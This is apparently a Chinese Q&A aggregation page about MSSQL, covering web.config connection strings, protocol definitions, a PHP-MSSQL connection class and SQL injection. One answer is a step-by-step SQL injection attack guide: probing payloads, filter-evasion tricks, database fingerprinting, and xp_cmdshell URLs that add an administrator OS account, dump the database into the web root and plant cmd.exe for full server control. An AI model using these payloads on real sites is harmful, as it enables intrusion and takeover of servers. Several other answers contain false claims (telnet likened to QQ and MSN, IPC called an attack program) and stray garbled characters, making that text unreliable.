『壹』 安裝MSsql資料庫如何改動web.config求指導啊可追加
<add key="SqlConnection" value="Provider=SQLOLEDB;Data Source=127.0.0.1;Initial Catalog=sql_data;User ID=sql_user;Password=sql_password" />
改這個,寫的很明確了已經賣陪。
sql_data,要旅慧連的庫
sql_user,登陸用戶名
Password,密碼拆配答
Data Source,資料庫地址
『貳』 伺服器上安裝了mssql2005和mssql2008問怎麼配置網站的web.config 訪問的是mssql2005而不是2008!!!!!!
設置訪問路徑不就好了
『叄』 POP3、FTP、IMAP、TELNET、MSSQL、MYSQL、WEB、IPC、RPC、DAEMON有什麼區別,講通俗點
通俗就是這些都是傳輸協議只是用不同的協議來傳輸而已
『肆』 什麼叫"注入攻擊"麻煩具體解釋一下
1、什麼是注入式攻擊
注入式攻擊是通過傳遞一些帶有特定的字元的參數來改變執行的SQL語句,從而達到破壞的效果。
2、如何來防範注入式攻擊
注入式攻擊主要是因為沒有對request.QueryString帶的參數進行驗證,從而給攻擊者有機會進行注入攻擊。
『伍』 POP3、FTP、IMAP、TELNET、MSSQL、MYSQL、WEB、IPC、RPC、DAEMON 這些是指什麼
pop3:郵件接受協議,對應的發送協議是SMTP。用於發送郵件
FTP:文件傳輸協議,類似的有HTTP什麼的。
IMAP:互動式郵件存取協議.和上面的POP3,有點關系。
TELNET:遠程登錄協議。常伏粗雀見的有QQ,MSN啥的缺早。
MSSQL:是微軟的sql server 的簡稱;是一種資料庫
mysql:也是一種資料庫,不過是MYSQL AB公司的,是開源的。
web:通常指網路了,沒什麼特殊的含義。
IPC:貌似是個什麼攻擊程序,不是很清楚
RPC:遠程調用協議,在和別人共享文件什麼的時候,就要用到這個東西。
DAEMON:是一個守護進程,在後台一直運行的。我好像沒凳滲在XP裡面見過,應該LINUX或UNIX里比較多吧,因為LINUX裡面好像有個防止等待的後台運行機制了。
差不多就這些了。
其實,樓上的地址挺全的,不過,就是看起來累。
『陸』 求大神詳細講解php連接mssql
為了能讓PHP連接MSSQL,系統需要安裝MSSQL,PHP,且在PHP.ini中的配置中,將 ;extension=php_mssql.dll前面的;去掉
1.連接MSSQL
$conn=mssql_connect("實例名或者伺服器IP","用戶名","密碼");
//測試連接
if($conn)
{
echo "連接成功";
}
2.選擇要連接的資料庫
mssql_select_db("dbname");
3.執行查詢
$rs = mssql_query("select top 1 id,username from tbname",$conn);
// 或者直接執行update,insert等語句,可以不用為返回結果賦值
mssql_query("update tbname set username='niunv' where id=1");
4.獲取記錄集行數
echo mssql_num_rows($rs);
5.獲取記錄集
if($row=mssql_fetch_array($rs))
{
$id = $row[0];//獲取ID欄位值
$username = $row[1];//獲取username欄位值
}
6.獲取新增記錄的ID
將id欄位設置為IDENTITY欄位,執行insert語句以後,就會產生一個
@@IDENTITY 全局變數值,查詢出來就是最後一條新增記錄的ID了.
mssql_query("insert into tbname(username) values ('nv')",$conn);
$rs = mssql_query("select @@IDENTITY as id",$conn);
if($row=mssql_fetch_array($rs))
{
echo $row[0];
}
7.釋放記錄集
mssql_free_result($rs);
8.關閉連接
mssql_close($conn);
注:用PHP操作MSSQL比在ASP連接MYSQL要簡單,所以,當需要MSSQL與MYSQL並存時,用PHP連接MSSQL來操作MYSQL與MSSQL並存比較簡單好用.如果是ASP連接MYSQL,需要安裝一個MYSQL驅動,默認windows的ODBC沒有安裝,很遺憾...
在web伺服器上至少安裝了mssql的客戶端
打開php.ini把;extension=php_mssql.dll
前面的分號去掉
有必要話:需要制定extension_dir
推薦使用 php<=4.0.9
<=5.0.3目前 我還沒有連接成功過4.010和 5.0.3
資料庫的 連接分頁可以到phpe.net上獲取到相應的class
下面是我修改的 一個class
<?php
/**
*mssql 資料庫連接類
**/
class SQL{
var $server;
var $userName;
var $passWord;
var $dataBase;
var $linkID = 0;
var $queryResult;
var $lastInsertID;
var $pageNum = 0;//分頁用---共有幾條數據
var $ER;
/**
*構造函數
**/
function SQL($Server='',$UserName='',$PassWord='',$DataBase=''){
$this->server = $Server;
$this->userName = $UserName;
$this->passWord = $PassWord;
$this->dataBase = $DataBase;
}
/**
*資料庫連接
**/
function db_connect(){
$this->linkID = mssql_pconnect($this->server,$this->userName,$this->passWord);
if(!$this->linkID){
$this->ER = "db_connect($this->server,$this->userName,$this->passWord) error";
return 0;
}
if (!mssql_select_db($this->dataBase,$this->linkID)) {
$this->ER = "mssql_select_db($this->dataBase,$this->lastInsertID) error";
return 0;
}
return $this->linkID;
}
/**public
* function: Check the database, if exist then select
* exist: return 1
* not exist: return 0
*/
function selectDatabase(){
if(mssql_select_db($this->dataBase))
return 1;
else
return 0;
}
/**
*數據操作
**/
function query($Str){
if ($this->linkID == 0) {
$this->ER = "資料庫還沒有連接!!";
}
$this->queryResult = mssql_query($Str);
//$this->queryResult = mssql_query($Str,$this->linkID);
if (!$this->queryResult) {
$this->ER = "$Str.沒有操作成功,query error!!";
return 0;//****************對於php 4.3.9以上版本的錯誤用1
}
return $this->queryResult;
}
/**
*數據獲取
**/
function fetch_array($result){
if($result != "") $this->queryResult = $result;
$rec =mssql_fetch_array($this->queryResult);
if(is_array($rec)){
return $rec;
}
//$this->ER = "沒有獲取數據!";
return 0;
}
/**public
* function: Free the Query Result
* success return 1
* failed: return 0
*/
function freeResult($result=""){
if($result != "") $this->queryResult = $result;
return mssql_free_result($this->queryResult);
}
/**
*獲取影響的的行數
*獲取操作過的行數
**/
function num_rows($result=""){
if ($result != "") {
$this->queryResult = $result;
$row = mssql_num_rows($this->queryResult);
return $row;
}
}
/**
*獲取查詢結果---多個
**/
function result_ar($str=''){
if (empty($str)) {
return 0;
}
$back = array();
$this->queryResult = $this->query($str);
while ($row = $this->fetch_array($this->queryResult)) {
$back[] = $row;
}
return $back;
}
/**
*資料庫信息分頁
*$Result 資料庫操作
*str ==sql語句
*page ==第幾頁
*showNum ==顯示幾頁
*/
function page($Str,$Page=0,$ShowNum=5){
$back = array();//返回數據
$maxNum = 0;
if ($Str == "") {
$this->ER = "沒有數據";
return 0;
}
$this->queryResult = $this->query($Str);
if($this->queryResult){
if($Page==""){
$nopa=0;
}else{
$nopa = ($Page-1)*$ShowNum;
if ($nopa<0) {
$nopa = 0;
}
}
$maxNum=$this->num_rows($this->queryResult);
$k=0;
$i=0;
$dd=$this->fetch_array($this->queryResult);
while($dd&&$nopa<=$maxNum&&$i<$ShowNum){
if($nopa >= $maxNum) $nopa = $maxNum;
mssql_data_seek($this->queryResult,$nopa);
$row=$this->fetch_array($this->queryResult);
$nopa++;
$i++;
$back[] = $row;
if ($nopa >=$maxNum) {
break;
}
}
}
$this->pageNum = $maxNum;
return $back;
}
/**
*分頁的html頁碼
*/
function page_html($DataNum=0,$Page=1,$ShowNum=3,$web,$Post=''){
if ($DataNum == 0) {
$back = "沒有要查詢的數據";
}else {
if ($ShowNum<=0) {
$ShowNum = 3;
}
if ($Page<=0) {
$Page = 1;
}
if (empty($web)) {
$web = "#";
}
$pageNum = ceil($DataNum/$ShowNum);
if ($Page <= 1) {
$top = "首頁<<";
}else {
$top = "<a href='".$web."?page=0&".$Post."' target='_self'>首頁<< </a>";
}
if ($Page !==1) {
$upPage = "<a href='".$web."?page=".($Page-1)."&".$Post."' target='_self'>上一頁</a>";
}else {
$upPage = "上一頁";
}
if ($Page < $pageNum) {
$downPage = "<a href='".$web."?page=".($Page+1)."&".$Post."' target='_self'>下一頁</a>";
}else {
$downPage = "下一頁";
}
if ($Page == $pageNum) {
$foot = ">>尾頁";
}else {
$foot = "<a href='".$web."?page=".$pageNum."&".$Post."' target='_self'> >>尾頁</a>";
}
$back = <<<EOT
共 $pageNum 頁
第 $Page/$pageNum 頁 $top $upPage $downPage $foot
EOT;
}
return $back;
}
}//end class
?>
以上就是PHP連接MSSQL方法的總結,
『柒』 SQL注入是怎麼回事
SQL注入攻擊是黑客對資料庫進行攻擊的常用手段之一。隨著B/S模式應用開發的發展,使用這種模式編寫應用程序的程序員也越來越多。但是由於程序員的水平及經驗也參差不齊,相當大一部分程序員在編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼,根據程序返回的結果,獲得某些他想得知的數據,這就是所謂的SQL Injection,即SQL注入。SQL注入是從正常的WWW埠訪問,而且表面看起來跟一般的Web頁面訪問沒什麼區別,所以目前市面的防火牆都不會對SQL注入發出警報,如果管理員沒查看IIS日誌的習慣,可能被入侵很長時間都不會發覺。但是,SQL注入的手法相當靈活,在注入的時候會碰到很多意外的情況,需要構造巧妙的SQL語句,從而成功獲取想要的數據。
SQL注入攻擊的總體思路
·發現SQL注入位置;
·判斷後台資料庫類型;
·確定XP_CMDSHELL可執行情況
·發現WEB虛擬目錄
·上傳ASP木馬;
·得到管理員許可權;
SQL注入攻擊的步驟
一、SQL注入漏洞的判斷
一般來說,SQL注入一般存在於形如:http://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的ASP動態網頁中,有時一個動態網頁中可能只有一個參數,有時可能有N個參數,有時是整型參數,有時是字元串型參數,不能一概而論。總之只要是帶有參數的動態網頁且此網頁訪問了資料庫,那麼就有可能存在SQL注入。如果ASP程序員沒有安全意識,不進行必要的字元過濾,存在SQL注入的可能性就非常大。
為了全面了解動態網頁回答的信息,首選請調整IE的配置。把IE菜單-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚,以下以http://xxx.xxx.xxx/abc.asp?p=YY為例進行分析,YY可能是整型,也有可能是字元串。
1、整型參數的判斷
當輸入的參數YY為整型時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 欄位=YY,所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號),此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』,abc.asp運行異常;
②http://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常,而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同;
③http://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常;
如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
2、字元串型參數的判斷
當輸入的參數YY為字元串時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 欄位='YY',所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號),此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』,abc.asp運行異常;
②http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='1', abc.asp運行正常,而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同;
③http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='2', abc.asp運行異常;
如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
3、特殊情況的處理
有時ASP程序員會在程序員過濾掉單引號等字元,以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法:由於VBS並不區分大小寫,而程序員在過濾時通常要麼全部過濾大寫字元串,要麼全部過濾小寫字元串,而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等;
②UNICODE法:在IIS中,以UNICODE字元集實現國際化,我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B,空格=%20 等;URLEncode信息參見附件一;
③ASCII碼法:可以把輸入的部分或全部字元全部用ASCII碼代替,如U=chr(85),a=chr(97)等,ASCII信息參見附件二;
二、分析資料庫伺服器類型
一般來說,ACCESS與SQL-SERVER是最常用的資料庫伺服器,盡管它們都支持T-SQL標准,但還有不同之處,而且不同的資料庫有不同的攻擊方法,必須要區別對待。
1、 利用資料庫伺服器的系統變數進行區分
SQL-SERVER有user,db_name()等系統變數,利用這些系統值不僅可以判斷SQL-SERVER,而且還可以得到大量有用信息。如:
① http://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當前連接到資料庫的用戶名
②http://xxx.xxx.xxx/abc.asp?p=YY&;n ... db_name()>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當前正在使用的資料庫名;
2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權,而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句:
①http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若資料庫是SQL-SERVE,則第一條,abc.asp一定運行正常,第二條則異常;若是ACCESS則兩條都會異常。
3、 MSSQL三個關鍵系統表
sysdatabases系統表:Microsoft SQL Server 上的每個資料庫在表中佔一行。最初安裝 SQL Server 時,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 資料庫的項。該表只存儲在 master 資料庫中。 這個表保存在master資料庫中,這個表中保存的是什麼信息呢?這個非常重要。他是 保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID,dbid從1到5是系統的。分別是:master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。
Sysobjects:SQL-SERVER的每個資料庫內都有此系統表,它存放該資料庫內創建的所有對象,如約束、默認值、日誌、規則、存儲過程等,每個對象在表中佔一行。
syscolumns:每個表和視圖中的每列在表中佔一行,存儲過程中的每個參數在表中也佔一行。該表位於每個資料庫中。主要欄位有:
name ,id, colid :分別是欄位名稱,表ID號,欄位ID號,其中的 ID 是 剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中,表的ID是123456789中的所有欄位列表。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA許可權,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以後的所有步驟都可以省
1、http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... er>0 abc.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。
2、http://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連接的資料庫名。
3、http://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主資料庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其後面的語句;「—」號是註解,表示其後面的所有內容僅為注釋,系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、http://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加的帳戶aaa加到administrators組中。
5、http://xxx.xxx.xxx/abc.asp?p=YY;backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
http://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
『捌』 我想在WIN7上做一個WEB(網站)伺服器,運行的是ASP程序和MSSQL資料庫,請問怎麼做
1.安裝IIS (部分版本的win7不含iis)
開始-控制面板-程序-打開或關閉windows功能
勾選internet信息服務,確保列表樹中的asp被勾上。
2.配置IIS7
IIS7 在安裝了上述組件後,控制面板-系統和安全-管理工具-Internet信息服務(IIS)
管理工具,打開運行。雙擊內頁中的ASP,即顯示ASP的設置內容,",然後在"Behavior(行為)"組中將"Enable Parent Paths(啟用父路徑)"設置為True即可。配置默認網站,填寫 物理路徑、應用程序池,點OK即可。
順便說一下:
我是win7 64位系統,之前在搭建asp+access時發現要進行如下設置:
應用程序池,高級設置-->允許32位應用程序 True
否則無法連接資料庫。
『玖』 什麼是AD,DHCP ,DNS, IIS ,Web ,Email,MssQL分別是什麼
AD是域控制器,DHCP是動態分配伺服器、DNS是域名服姿清務器、IIS是系統組件、Web網站伺服器、Email是郵件伺服器賀局、MySQL是數據禪冊讓庫。
『拾』 web功能實現投票飆升榜功能,用MSSQL,求助
那把統計的語句改成這12小時內,就是加時間條件限制